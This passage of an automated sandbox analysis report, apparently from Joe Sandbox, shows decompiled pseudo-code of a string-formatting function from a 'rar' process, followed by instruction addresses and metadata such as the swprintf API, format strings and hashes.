				if (_t353 == 0) goto 0x50b5c1ee;
				if (_t353 == 0) goto 0x50b5c1e4;
				_t276 = _t270 - 0x30;
				if (_t353 == 0) goto 0x50b5c1da;
				_t354 = _t276 - 1;
				if (_t354 != 0) goto 0x50b5c819;
				_t61 = E00007FF67FF650B27B00(E00007FF67FF650B54598(0xe44, _t337, _t375, _t440, _t441,  *_t439),  *_t439, _t373,  *((intOrPtr*)(_t439 + 8)),  *((intOrPtr*)(_t439 + 8)));
				_t391 = "\n";
				goto 0x50b5c814;
				goto 0x50b5c6b8;
				goto 0x50b5c146;
				goto 0x50b5c6b8;
				goto 0x50b5bd94;
				goto 0x50b5c80c;
				goto 0x50b5c6b8;
				if (_t354 == 0) goto 0x50b5c279;
				if (_t354 == 0) goto 0x50b5c26f;
				if (_t354 == 0) goto 0x50b5c265;
				if (_t354 == 0) goto 0x50b5c25b;
				if (_t354 == 0) goto 0x50b5c251;
				_t282 = _t276 - 0x3a;
				if (_t354 == 0) goto 0x50b5c247;
				if (_t282 != 1) goto 0x50b5c819;
				goto 0x50b5bdd4;
				goto 0x50b5bdd4;
				goto 0x50b5c146;
				goto 0x50b5c80c;
				goto 0x50b5c80c;
				goto 0x50b5c6b8;
				goto 0x50b5c6b8;
				goto 0x50b5be2e;
				_t356 = _t282 - 0x6c;
				if (_t356 > 0) goto 0x50b5c50a;
				if (_t356 == 0) goto 0x50b5c500;
				_t357 = _t282 - 0x5b;
				if (_t357 > 0) goto 0x50b5c3e9;
				if (_t357 == 0) goto 0x50b5c3df;
				_t358 = _t282 - 0x53;
				if (_t358 > 0) goto 0x50b5c33c;
				if (_t358 == 0) goto 0x50b5c332;
				if (_t358 == 0) goto 0x50b5c328;
				if (_t358 == 0) goto 0x50b5c31e;
				if (_t358 == 0) goto 0x50b5c314;
				if (_t358 == 0) goto 0x50b5c30a;
				if (_t358 == 0) goto 0x50b5c300;
				if (_t358 == 0) goto 0x50b5c2f6;
				_t289 = _t282 - 0x41;
				if (_t358 == 0) goto 0x50b5c2ec;
				_t359 = _t289 - 1;
				if (_t359 != 0) goto 0x50b5c819;
				goto 0x50b5bdd4;
				goto 0x50b5bdd4;
				goto 0x50b5bdd4;
				goto 0x50b5bdd4;
				goto 0x50b5be76;
				goto 0x50b5c6b8;
				goto 0x50b5c146;
				goto 0x50b5be76;
				goto 0x50b5bdd4;
				if (_t359 == 0) goto 0x50b5c3d5;
				if (_t359 == 0) goto 0x50b5c3b7;
				if (_t359 == 0) goto 0x50b5c38f;
				if (_t359 == 0) goto 0x50b5c385;
				if (_t359 == 0) goto 0x50b5c37b;
				_t295 = _t289 - 0x4f;
				if (_t359 == 0) goto 0x50b5c371;
				if (_t295 != 1) goto 0x50b5c819;
				goto 0x50b5bdd4;
				goto 0x50b5bdd4;
				goto 0x50b5bdd4;
				goto 0x50b5be76;
				_t374 =  *((intOrPtr*)(_t391 + 0x10));
				_t463 =  *((intOrPtr*)(_t391 + 8));
				_t455 =  *_t391;
				_v552 =  *((intOrPtr*)(_t391 + 0x10));
				E00007FF67FF650B27B00(_t61, _t391, L"\n%ls%ls%ls",  *_t391,  *((intOrPtr*)(_t391 + 8)));
				goto 0x50b5bd94;
				E00007FF67FF650B54598(0xea2, _t337, _t375, _t440, _t441,  *_t391);
				r8d =  *((intOrPtr*)(_t439 + 0x40));
				E00007FF67FF650B283F0( *((intOrPtr*)(_t391 + 0x10)),  *_t439,  *_t391,  *((intOrPtr*)(_t391 + 8)));
				goto 0x50b5c819;
				goto 0x50b5bdd4;
				goto 0x50b5bdd4;
				_t361 = _t295 - 0x63;
				if (_t361 > 0) goto 0x50b5c48e;
				if (_t361 == 0) goto 0x50b5c468;
				if (_t361 == 0) goto 0x50b5c45e;
				if (_t361 == 0) goto 0x50b5c454;
				if (_t361 == 0) goto 0x50b5c44a;
				if (_t361 == 0) goto 0x50b5c440;
				if (_t361 == 0) goto 0x50b5c436;
				if (_t361 == 0) goto 0x50b5c425;
				_t362 = _t295 - 0x57 - 1;
				if (_t362 != 0) goto 0x50b5c819;
				goto 0x50b5bd94;
				E00007FF67FF650B54598(0xec4, _t337, _t375, _t440, _t441,  *_t391);
				goto 0x50b5c126;
				goto 0x50b5be76;
				goto 0x50b5c6b8;
				goto 0x50b5be76;
				goto 0x50b5be76;
				goto 0x50b5bdd4;
				E00007FF67FF650B54598(0xeca, _t337, _t375, _t440, _t441,  *_t391);
				E00007FF67FF650B28208( *((intOrPtr*)(_t391 + 0x10)),  *_t439,  *_t391,  *((intOrPtr*)(_t391 + 8)));
				E00007FF67FF650B28208(0x50b859c4,  *_t439, _t455,  *((intOrPtr*)(_t391 + 8)));
				goto 0x50b5c819;
				if (_t362 == 0) goto 0x50b5c4f6;
				if (_t362 == 0) goto 0x50b5c4e7;
				if (_t362 == 0) goto 0x50b5c4dd;
				if (_t362 == 0) goto 0x50b5c4d3;
				if (_t362 == 0) goto 0x50b5c4c9;
				_t308 =  *((intOrPtr*)(_t439 + 0x40)) - 0x5e;
				if (_t362 == 0) goto 0x50b5c4bf;
				if (_t308 != 1) goto 0x50b5c819;
				goto 0x50b5c80c;
				goto 0x50b5c80c;
				goto 0x50b5c80c;
				goto 0x50b5c80c;
				goto 0x50b5c0aa;
				goto 0x50b5c0b5;
				goto 0x50b5c103;
				goto 0x50b5c80c;
				_t364 = _t308 - 0x7d;
				if (_t364 > 0) goto 0x50b5c65f;
				if (_t364 == 0) goto 0x50b5c655;
				_t365 = _t308 - 0x75;
				if (_t365 > 0) goto 0x50b5c5c7;
				if (_t365 == 0) goto 0x50b5c5bd;
				if (_t365 == 0) goto 0x50b5c5b3;
				if (_t365 == 0) goto 0x50b5c5a9;
				if (_t365 == 0) goto 0x50b5c587;
				if (_t365 == 0) goto 0x50b5c580;
				if (_t365 == 0) goto 0x50b5c576;
				if (_t365 == 0) goto 0x50b5c56c;
				if (_t365 == 0) goto 0x50b5c562;
				_t366 = _t308 - 0x67 - 1;
				if (_t366 != 0) goto 0x50b5c819;
				goto 0x50b5c6b8;
				goto 0x50b5c0aa;
				goto 0x50b5c80c;
				goto 0x50b5c80c;
				goto 0x50b5c58c;
				E00007FF67FF650B54598(0xe98, _t337, _t375, _t440, _t441, _t455);
				r9d =  *((intOrPtr*)(_t439 + 0x48));
				r8d =  *((intOrPtr*)(_t439 + 0x44));
				E00007FF67FF650B283F0( *((intOrPtr*)(_t391 + 0x10)),  *0x50b859c4, _t455,  *((intOrPtr*)(_t391 + 8)));
				goto 0x50b5c819;
				goto 0x50b5c80c;
				goto 0x50b5c059;
				goto 0x50b5c0aa;
				if (_t366 == 0) goto 0x50b5c64b;
				if (_t366 == 0) goto 0x50b5c62d;
				if (_t366 == 0) goto 0x50b5c623;
				if (_t366 == 0) goto 0x50b5c609;
				if (_t366 == 0) goto 0x50b5c602;
				if (_t366 == 0) goto 0x50b5c5f8;
				if ( *((intOrPtr*)(_t439 + 0x40)) - 0x71 != 1) goto 0x50b5c819;
				goto 0x50b5c80c;
				goto 0x50b5c0aa;
				goto 0x50b5c60e;
				E00007FF67FF650B54598(0xe5e, _t337, _t375, _t440, _t441, _t455);
				_t323 =  *((intOrPtr*)(_t439 + 0x40));
				E00007FF67FF650B283F0(_t374,  *0x50b859c4, _t455,  *((intOrPtr*)(_t391 + 8)));
				goto 0x50b5c819;
				goto 0x50b5c80c;
				E00007FF67FF650B54598(0xe68, _t337, _t375, _t440, _t441, _t455);
				_t456 =  *((intOrPtr*)(_t439 + 8));
				E00007FF67FF650B283F0(_t374,  *_t439,  *((intOrPtr*)(_t439 + 8)), _t463);
				goto 0x50b5c819;
				goto 0x50b5c0aa;
				goto 0x50b5c0aa;
				_t368 = _t323 - 0x87;
				if (_t368 > 0) goto 0x50b5c739;
				if (_t368 == 0) goto 0x50b5c71b;
				if (_t368 == 0) goto 0x50b5c6fd;
				if (_t368 == 0) goto 0x50b5c6f3;
				if (_t368 == 0) goto 0x50b5c6e1;
				if (_t368 == 0) goto 0x50b5c6cd;
				if (_t368 == 0) goto 0x50b5c6b3;
				_t329 = _t323 - 0x77;
				if (_t368 == 0) goto 0x50b5c6a9;
				_t369 = _t329 - 1;
				if (_t369 != 0) goto 0x50b5c819;
				goto 0x50b5c814;
				goto 0x50b5c80c;
				E00007FF67FF650B27B00(E00007FF67FF650B54598(0xe94, _t337, _t375, _t440, _t441,  *((intOrPtr*)(_t439 + 8))),  *_t439, _t374,  *((intOrPtr*)(_t439 + 8)), _t463);
				goto 0x50b5c819;
				E00007FF67FF650B2C924(_t369, _t375, 0x50ba7ab8,  *((intOrPtr*)( *_t439)), _t463);
				goto 0x50b5c819;
				E00007FF67FF650B54598(0xd06, _t337, _t375, _t440, _t441,  *((intOrPtr*)(_t439 + 8)));
				goto 0x50b5c484;
				goto 0x50b5be76;
				E00007FF67FF650B54598(0xe6c, _t337, _t375, _t440, _t441,  *((intOrPtr*)(_t439 + 8)));
				E00007FF67FF650B283F0(_t374,  *((intOrPtr*)( *_t439)),  *((intOrPtr*)(_t439 + 8)), _t463);
				goto 0x50b5c814;
				E00007FF67FF650B54598(0xd4a, _t337, _t375, _t440, _t441, _t456);
				E00007FF67FF650B283F0(_t374,  *((intOrPtr*)( *_t439)), _t456, _t463);
				goto 0x50b5c814;
				if (_t369 == 0) goto 0x50b5c7dc;
				if (_t369 == 0) goto 0x50b5c7d2;
				if (_t369 == 0) goto 0x50b5c7b7;
				if (_t369 == 0) goto 0x50b5c7a8;
				if (_t369 == 0) goto 0x50b5c79f;
				if (_t369 == 0) goto 0x50b5c784;
				if (_t329 - 0x84 != 4) goto 0x50b5c819;
				E00007FF67FF650B54598(0xe9e, _t337, _t375, _t440, _t441, _t456);
				goto 0x50b5c0b5;
				E00007FF67FF650B54598(0xe20, _t337, _t375, _t440, _t441, _t456);
				E00007FF67FF650B283F0(_t374, _t374, _t456, _t463);
				goto 0x50b5c814;
				goto 0x50b5c814;
				goto 0x50b5c619;
				E00007FF67FF650B54598(0xe88, _t337, _t375, _t440, _t441, _t456);
				E00007FF67FF650B283F0(_t374, _t374, _t456, _t463);
				goto 0x50b5c814;
				goto 0x50b5c60e;
				asm("sbb ecx, ecx");
				E00007FF67FF650B54598(0xd44, _t337, _t375, _t440, _t441, _t456);
				E00007FF67FF650B283F0(_t374,  *_t439, _t456, _t463);
				asm("sbb ecx, ecx");
				E00007FF67FF650B54598(0x1a8c, _t337, _t375, _t440, _t441, _t456);
				return E00007FF67FF650B69D10(E00007FF67FF650B283F0(_t374,  *_t439, _t456, _t463), 0x1a8c, _v24 ^ _t442 - 0x00000240);
			}















































                                                                                                            0x7ff650b5bcd8
                                                                                                            0x7ff650b5bcd8
                                                                                                            0x7ff650b5bcd8
                                                                                                            0x7ff650b5bcd8
                                                                                                            0x7ff650b5bcd8
                                                                                                            0x7ff650b5bcd8
                                                                                                            0x7ff650b5bce5
                                                                                                            0x7ff650b5bcec
                                                                                                            0x7ff650b5bcef
                                                                                                            0x7ff650b5bcf7
                                                                                                            0x7ff650b5bcfa
                                                                                                            0x7ff650b5bd06
                                                                                                            0x7ff650b5bd0d
                                                                                                            0x7ff650b5bd10
                                                                                                            0x7ff650b5bd16
                                                                                                            0x7ff650b5bd1c
                                                                                                            0x7ff650b5bd1f
                                                                                                            0x7ff650b5bd25
                                                                                                            0x7ff650b5bd2b
                                                                                                            0x7ff650b5bd2e
                                                                                                            0x7ff650b5bd34
                                                                                                            0x7ff650b5bd3a
                                                                                                            0x7ff650b5bd3d
                                                                                                            0x7ff650b5bd43
                                                                                                            0x7ff650b5bd49
                                                                                                            0x7ff650b5bd4b
                                                                                                            0x7ff650b5bd54
                                                                                                            0x7ff650b5bd5d
                                                                                                            0x7ff650b5bd62
                                                                                                            0x7ff650b5bd67
                                                                                                            0x7ff650b5bd6c
                                                                                                            0x7ff650b5bd6e
                                                                                                            0x7ff650b5bd71
                                                                                                            0x7ff650b5bd73
                                                                                                            0x7ff650b5bd76
                                                                                                            0x7ff650b5bd81
                                                                                                            0x7ff650b5bd8a
                                                                                                            0x7ff650b5bd94
                                                                                                            0x7ff650b5bd9b
                                                                                                            0x7ff650b5bda5
                                                                                                            0x7ff650b5bdbe
                                                                                                            0x7ff650b5bdc3
                                                                                                            0x7ff650b5bdcd
                                                                                                            0x7ff650b5bdd4
                                                                                                            0x7ff650b5bde3
                                                                                                            0x7ff650b5bdf1
                                                                                                            0x7ff650b5bdf6
                                                                                                            0x7ff650b5be00
                                                                                                            0x7ff650b5be05
                                                                                                            0x7ff650b5be0a
                                                                                                            0x7ff650b5be0f
                                                                                                            0x7ff650b5be14
                                                                                                            0x7ff650b5be19
                                                                                                            0x7ff650b5be1b
                                                                                                            0x7ff650b5be1e
                                                                                                            0x7ff650b5be23
                                                                                                            0x7ff650b5be2e
                                                                                                            0x7ff650b5be37
                                                                                                            0x7ff650b5be41
                                                                                                            0x7ff650b5be4b
                                                                                                            0x7ff650b5be52
                                                                                                            0x7ff650b5be5b
                                                                                                            0x7ff650b5be65
                                                                                                            0x7ff650b5be6f
                                                                                                            0x7ff650b5be76
                                                                                                            0x7ff650b5be81
                                                                                                            0x7ff650b5be8b
                                                                                                            0x7ff650b5be90
                                                                                                            0x7ff650b5be93
                                                                                                            0x7ff650b5be99
                                                                                                            0x7ff650b5bea2
                                                                                                            0x7ff650b5beab
                                                                                                            0x7ff650b5beb0
                                                                                                            0x7ff650b5beb5
                                                                                                            0x7ff650b5beba
                                                                                                            0x7ff650b5bebf
                                                                                                            0x7ff650b5bec1
                                                                                                            0x7ff650b5bec4
                                                                                                            0x7ff650b5bec6
                                                                                                            0x7ff650b5bec9
                                                                                                            0x7ff650b5bed4
                                                                                                            0x7ff650b5bede
                                                                                                            0x7ff650b5bef2
                                                                                                            0x7ff650b5befe
                                                                                                            0x7ff650b5bf08
                                                                                                            0x7ff650b5bf12
                                                                                                            0x7ff650b5bf1c
                                                                                                            0x7ff650b5bf31
                                                                                                            0x7ff650b5bf3d
                                                                                                            0x7ff650b5bf47
                                                                                                            0x7ff650b5bf51
                                                                                                            0x7ff650b5bf59
                                                                                                            0x7ff650b5bf5e
                                                                                                            0x7ff650b5bf63
                                                                                                            0x7ff650b5bf68
                                                                                                            0x7ff650b5bf6d
                                                                                                            0x7ff650b5bf72
                                                                                                            0x7ff650b5bf77
                                                                                                            0x7ff650b5bf82
                                                                                                            0x7ff650b5bf8c
                                                                                                            0x7ff650b5bf96
                                                                                                            0x7ff650b5bfa0
                                                                                                            0x7ff650b5bfaa
                                                                                                            0x7ff650b5bfb4
                                                                                                            0x7ff650b5bfbe
                                                                                                            0x7ff650b5bfc8
                                                                                                            0x7ff650b5bfde
                                                                                                            0x7ff650b5bfe7
                                                                                                            0x7ff650b5bff3
                                                                                                            0x7ff650b5bffb
                                                                                                            0x7ff650b5c001
                                                                                                            0x7ff650b5c00a
                                                                                                            0x7ff650b5c010
                                                                                                            0x7ff650b5c019
                                                                                                            0x7ff650b5c022
                                                                                                            0x7ff650b5c02b
                                                                                                            0x7ff650b5c030
                                                                                                            0x7ff650b5c035
                                                                                                            0x7ff650b5c03a
                                                                                                            0x7ff650b5c03f
                                                                                                            0x7ff650b5c044
                                                                                                            0x7ff650b5c04f
                                                                                                            0x7ff650b5c059
                                                                                                            0x7ff650b5c05e
                                                                                                            0x7ff650b5c068
                                                                                                            0x7ff650b5c06d
                                                                                                            0x7ff650b5c077
                                                                                                            0x7ff650b5c081
                                                                                                            0x7ff650b5c086
                                                                                                            0x7ff650b5c08d
                                                                                                            0x7ff650b5c094
                                                                                                            0x7ff650b5c099
                                                                                                            0x7ff650b5c0a3
                                                                                                            0x7ff650b5c0aa
                                                                                                            0x7ff650b5c0b5
                                                                                                            0x7ff650b5c0ba
                                                                                                            0x7ff650b5c0c4
                                                                                                            0x7ff650b5c0ce
                                                                                                            0x7ff650b5c0d6
                                                                                                            0x7ff650b5c0df
                                                                                                            0x7ff650b5c0e4
                                                                                                            0x7ff650b5c0e9
                                                                                                            0x7ff650b5c0ee
                                                                                                            0x7ff650b5c0f0
                                                                                                            0x7ff650b5c0f3
                                                                                                            0x7ff650b5c0f8
                                                                                                            0x7ff650b5c103
                                                                                                            0x7ff650b5c114
                                                                                                            0x7ff650b5c11e
                                                                                                            0x7ff650b5c126
                                                                                                            0x7ff650b5c12d
                                                                                                            0x7ff650b5c132
                                                                                                            0x7ff650b5c13c
                                                                                                            0x7ff650b5c146
                                                                                                            0x7ff650b5c14e
                                                                                                            0x7ff650b5c158
                                                                                                            0x7ff650b5c162
                                                                                                            0x7ff650b5c16c
                                                                                                            0x7ff650b5c176
                                                                                                            0x7ff650b5c17b
                                                                                                            0x7ff650b5c17e
                                                                                                            0x7ff650b5c184
                                                                                                            0x7ff650b5c18d
                                                                                                            0x7ff650b5c196
                                                                                                            0x7ff650b5c19b
                                                                                                            0x7ff650b5c1a0
                                                                                                            0x7ff650b5c1a5
                                                                                                            0x7ff650b5c1a7
                                                                                                            0x7ff650b5c1aa
                                                                                                            0x7ff650b5c1ac
                                                                                                            0x7ff650b5c1af
                                                                                                            0x7ff650b5c1c9
                                                                                                            0x7ff650b5c1ce
                                                                                                            0x7ff650b5c1d5
                                                                                                            0x7ff650b5c1df
                                                                                                            0x7ff650b5c1e9
                                                                                                            0x7ff650b5c1f3
                                                                                                            0x7ff650b5c1fd
                                                                                                            0x7ff650b5c207
                                                                                                            0x7ff650b5c211
                                                                                                            0x7ff650b5c219
                                                                                                            0x7ff650b5c21e
                                                                                                            0x7ff650b5c223
                                                                                                            0x7ff650b5c228
                                                                                                            0x7ff650b5c22d
                                                                                                            0x7ff650b5c22f
                                                                                                            0x7ff650b5c232
                                                                                                            0x7ff650b5c237
                                                                                                            0x7ff650b5c242
                                                                                                            0x7ff650b5c24c
                                                                                                            0x7ff650b5c256
                                                                                                            0x7ff650b5c260
                                                                                                            0x7ff650b5c26a
                                                                                                            0x7ff650b5c274
                                                                                                            0x7ff650b5c27e
                                                                                                            0x7ff650b5c288
                                                                                                            0x7ff650b5c28d
                                                                                                            0x7ff650b5c290
                                                                                                            0x7ff650b5c296
                                                                                                            0x7ff650b5c29c
                                                                                                            0x7ff650b5c29f
                                                                                                            0x7ff650b5c2a5
                                                                                                            0x7ff650b5c2ab
                                                                                                            0x7ff650b5c2ae
                                                                                                            0x7ff650b5c2b4
                                                                                                            0x7ff650b5c2b9
                                                                                                            0x7ff650b5c2be
                                                                                                            0x7ff650b5c2c3
                                                                                                            0x7ff650b5c2c8
                                                                                                            0x7ff650b5c2cd
                                                                                                            0x7ff650b5c2d2
                                                                                                            0x7ff650b5c2d4
                                                                                                            0x7ff650b5c2d7
                                                                                                            0x7ff650b5c2d9
                                                                                                            0x7ff650b5c2dc
                                                                                                            0x7ff650b5c2e7
                                                                                                            0x7ff650b5c2f1
                                                                                                            0x7ff650b5c2fb
                                                                                                            0x7ff650b5c305
                                                                                                            0x7ff650b5c30f
                                                                                                            0x7ff650b5c319
                                                                                                            0x7ff650b5c323
                                                                                                            0x7ff650b5c32d
                                                                                                            0x7ff650b5c337
                                                                                                            0x7ff650b5c33f
                                                                                                            0x7ff650b5c348
                                                                                                            0x7ff650b5c34d
                                                                                                            0x7ff650b5c352
                                                                                                            0x7ff650b5c357
                                                                                                            0x7ff650b5c359
                                                                                                            0x7ff650b5c35c
                                                                                                            0x7ff650b5c361
                                                                                                            0x7ff650b5c36c
                                                                                                            0x7ff650b5c376
                                                                                                            0x7ff650b5c380
                                                                                                            0x7ff650b5c38a
                                                                                                            0x7ff650b5c38f
                                                                                                            0x7ff650b5c39a
                                                                                                            0x7ff650b5c39e
                                                                                                            0x7ff650b5c3a3
                                                                                                            0x7ff650b5c3a8
                                                                                                            0x7ff650b5c3b2
                                                                                                            0x7ff650b5c3bc
                                                                                                            0x7ff650b5c3c1
                                                                                                            0x7ff650b5c3cb
                                                                                                            0x7ff650b5c3d0
                                                                                                            0x7ff650b5c3da
                                                                                                            0x7ff650b5c3e4
                                                                                                            0x7ff650b5c3e9
                                                                                                            0x7ff650b5c3ec
                                                                                                            0x7ff650b5c3f2
                                                                                                            0x7ff650b5c3f7
                                                                                                            0x7ff650b5c3fc
                                                                                                            0x7ff650b5c401
                                                                                                            0x7ff650b5c406
                                                                                                            0x7ff650b5c40b
                                                                                                            0x7ff650b5c410
                                                                                                            0x7ff650b5c412
                                                                                                            0x7ff650b5c415
                                                                                                            0x7ff650b5c420
                                                                                                            0x7ff650b5c42a
                                                                                                            0x7ff650b5c431
                                                                                                            0x7ff650b5c43b
                                                                                                            0x7ff650b5c445
                                                                                                            0x7ff650b5c44f
                                                                                                            0x7ff650b5c459
                                                                                                            0x7ff650b5c463
                                                                                                            0x7ff650b5c46d
                                                                                                            0x7ff650b5c478
                                                                                                            0x7ff650b5c484
                                                                                                            0x7ff650b5c489
                                                                                                            0x7ff650b5c491
                                                                                                            0x7ff650b5c496
                                                                                                            0x7ff650b5c49b
                                                                                                            0x7ff650b5c4a0
                                                                                                            0x7ff650b5c4a5
                                                                                                            0x7ff650b5c4a7
                                                                                                            0x7ff650b5c4aa
                                                                                                            0x7ff650b5c4af
                                                                                                            0x7ff650b5c4ba
                                                                                                            0x7ff650b5c4c4
                                                                                                            0x7ff650b5c4ce
                                                                                                            0x7ff650b5c4d8
                                                                                                            0x7ff650b5c4e2
                                                                                                            0x7ff650b5c4f1
                                                                                                            0x7ff650b5c4fb
                                                                                                            0x7ff650b5c505
                                                                                                            0x7ff650b5c50a
                                                                                                            0x7ff650b5c50d
                                                                                                            0x7ff650b5c513
                                                                                                            0x7ff650b5c519
                                                                                                            0x7ff650b5c51c
                                                                                                            0x7ff650b5c522
                                                                                                            0x7ff650b5c52b
                                                                                                            0x7ff650b5c534
                                                                                                            0x7ff650b5c539
                                                                                                            0x7ff650b5c53e
                                                                                                            0x7ff650b5c543
                                                                                                            0x7ff650b5c548
                                                                                                            0x7ff650b5c54d
                                                                                                            0x7ff650b5c54f
                                                                                                            0x7ff650b5c552
                                                                                                            0x7ff650b5c55d
                                                                                                            0x7ff650b5c567
                                                                                                            0x7ff650b5c571
                                                                                                            0x7ff650b5c57b
                                                                                                            0x7ff650b5c585
                                                                                                            0x7ff650b5c58c
                                                                                                            0x7ff650b5c591
                                                                                                            0x7ff650b5c598
                                                                                                            0x7ff650b5c59f
                                                                                                            0x7ff650b5c5a4
                                                                                                            0x7ff650b5c5ae
                                                                                                            0x7ff650b5c5b8
                                                                                                            0x7ff650b5c5c2
                                                                                                            0x7ff650b5c5ca
                                                                                                            0x7ff650b5c5cf
                                                                                                            0x7ff650b5c5d4
                                                                                                            0x7ff650b5c5d9
                                                                                                            0x7ff650b5c5de
                                                                                                            0x7ff650b5c5e3
                                                                                                            0x7ff650b5c5e8
                                                                                                            0x7ff650b5c5f3
                                                                                                            0x7ff650b5c5fd
                                                                                                            0x7ff650b5c607
                                                                                                            0x7ff650b5c60e
                                                                                                            0x7ff650b5c613
                                                                                                            0x7ff650b5c619
                                                                                                            0x7ff650b5c61e
                                                                                                            0x7ff650b5c628
                                                                                                            0x7ff650b5c632
                                                                                                            0x7ff650b5c637
                                                                                                            0x7ff650b5c641
                                                                                                            0x7ff650b5c646
                                                                                                            0x7ff650b5c650
                                                                                                            0x7ff650b5c65a
                                                                                                            0x7ff650b5c664
                                                                                                            0x7ff650b5c666
                                                                                                            0x7ff650b5c66c
                                                                                                            0x7ff650b5c675
                                                                                                            0x7ff650b5c67e
                                                                                                            0x7ff650b5c683
                                                                                                            0x7ff650b5c688
                                                                                                            0x7ff650b5c68d
                                                                                                            0x7ff650b5c68f
                                                                                                            0x7ff650b5c692
                                                                                                            0x7ff650b5c694
                                                                                                            0x7ff650b5c697
                                                                                                            0x7ff650b5c6a4
                                                                                                            0x7ff650b5c6ae
                                                                                                            0x7ff650b5c6c3
                                                                                                            0x7ff650b5c6c8
                                                                                                            0x7ff650b5c6d7
                                                                                                            0x7ff650b5c6dc
                                                                                                            0x7ff650b5c6e6
                                                                                                            0x7ff650b5c6ee
                                                                                                            0x7ff650b5c6f8
                                                                                                            0x7ff650b5c702
                                                                                                            0x7ff650b5c70a
                                                                                                            0x7ff650b5c716
                                                                                                            0x7ff650b5c720
                                                                                                            0x7ff650b5c728
                                                                                                            0x7ff650b5c734
                                                                                                            0x7ff650b5c73f
                                                                                                            0x7ff650b5c748
                                                                                                            0x7ff650b5c751
                                                                                                            0x7ff650b5c756
                                                                                                            0x7ff650b5c75b
                                                                                                            0x7ff650b5c760
                                                                                                            0x7ff650b5c765
                                                                                                            0x7ff650b5c770
                                                                                                            0x7ff650b5c77f
                                                                                                            0x7ff650b5c789
                                                                                                            0x7ff650b5c791
                                                                                                            0x7ff650b5c79d
                                                                                                            0x7ff650b5c7a6
                                                                                                            0x7ff650b5c7b2
                                                                                                            0x7ff650b5c7bc
                                                                                                            0x7ff650b5c7c4
                                                                                                            0x7ff650b5c7d0
                                                                                                            0x7ff650b5c7d7
                                                                                                            0x7ff650b5c7e4
                                                                                                            0x7ff650b5c7ef
                                                                                                            0x7ff650b5c7fa
                                                                                                            0x7ff650b5c801
                                                                                                            0x7ff650b5c80c
                                                                                                            0x7ff650b5c839

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: swprintf
                                                                                                            • String ID: %ls$%ls%ls%ls$%s$ $ $ $ $ $ $%s $%s: %s
                                                                                                            • API String ID: 233258989-3227691853
                                                                                                            • Opcode ID: a6216b7a9daaa7232a1d8824c2ef017ffd2f90c1961eece31845b34382a81d5f
                                                                                                            • Instruction ID: f40ff29a587a964b195ae65fa12368231d3868edfa61713b85d962663277c24f
                                                                                                            • Opcode Fuzzy Hash: a6216b7a9daaa7232a1d8824c2ef017ffd2f90c1961eece31845b34382a81d5f
                                                                                                            • Instruction Fuzzy Hash: F9526D29E0E043AAF6695568C5E857811A3AF87344F1C85B6C60FF7BD9FD2FF9008242
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B538F8 Relevance: 21.6, APIs: 2, Strings: 10, Instructions: 563COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
